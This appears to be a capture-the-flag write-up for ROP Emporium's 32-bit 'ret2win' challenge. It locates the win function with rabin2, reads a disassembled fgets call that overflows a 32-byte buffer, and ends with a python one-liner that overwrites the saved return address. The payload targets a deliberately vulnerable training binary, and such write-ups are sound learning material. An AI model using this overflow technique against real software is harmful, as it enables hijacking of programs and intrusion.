ret2win
=======

Get the 32-bit `ret2win` binary from the
[URL on ropemporium.com](https://ropemporium.com/binary/ret2win32.zip):

    curl -O https://ropemporium.com/binary/ret2win32.zip
    unzip ret2win32.zip

The documentation tells us that all we need to do to win is call a particular
suspiciously named function, so let's use `rabin2` to find that:

    rabin2 -qs | grep win

When I run this, it tells me that `ret2win()` will be loaded at 0x08048659.

So we just need to figure out an input that will overwrite the saved EIP with
this address. This challenge makes that straightforward. They tell us that the
binary tries to read 50 bytes into a 32-byte buffer, and indeed, using objdump
on `pwnme()`, we get:

    8048648:       6a 32                   push   $0x32            # read 50B
    804864a:       8d 45 d8                lea    -0x28(%ebp),%eax # %ebp - 40B
    804864d:       50                      push   %eax
    804864e:       e8 bd fd ff ff          call   8048410 <fgets@plt>

So when `fgets()` gets called, the stack looks like this:

    +-------------+
    |  saved EIP  |
    +-------------+
    |  saved EBP  |
    +-------------+ <-- current EBP
    | 8B of stuff |
    |             |
    +-------------+
    |  32B buffer |
    .             .
    .             .
    +-------------+ <-- fgets() writes here

If we write 44 bytes, the next word we write will be loaded when `pwnme()` calls
`ret`. This will work:

    python -c 'print("A"*44 + "\x59\x86\x04\x08")' | ./ret2win32
